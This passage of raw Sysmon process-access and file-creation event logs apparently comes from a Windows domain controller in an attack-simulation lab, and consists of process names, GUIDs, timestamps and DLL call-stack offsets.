indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002820Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002819Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002818Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002817Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16DE-5F84-8600-000000007F01}4616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002816Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-1000-000000007F01}11441872C:\Windows\system32\svchost.exe{5D479F2C-16DE-5F84-8600-000000007F01}4616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002815Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002814Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:06.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002862Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:07.511{5D479F2C-169F-5F84-0B00-000000007F01}8641112C:\Windows\system32\lsass.exe{5D479F2C-16D9-5F84-8400-000000007F01}4376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002861Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:07.042{5D479F2C-16A1-5F84-1000-000000007F01}11444416C:\Windows\system32\svchost.exe{5D479F2C-16DF-5F84-8A00-000000007F01}4872C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002860Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:07.026{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16DF-5F84-8A00-000000007F01}4872C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002859Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:07.026{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16DF-5F84-8A00-000000007F01}4872C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002858Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:07.026{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16DF-5F84-8A00-000000007F01}4872C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002925Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.995{5D479F2C-16E1-5F84-8E00-000000007F01}4972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4hr4w4mp.00m.ps12020-10-12 08:42:09.995 10341000x80000000000000002924Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.980{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16E1-5F84-8E00-000000007F01}4972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002923Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16E1-5F84-8C00-000000007F01}50885100C:\Windows\system32\conhost.exe{5D479F2C-16E1-5F84-8E00-000000007F01}4972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002922Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002921Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002920Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002919Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002918Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1400-000000007F01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002916Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002915Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002914Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002913Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002912Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:42:09.948{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\S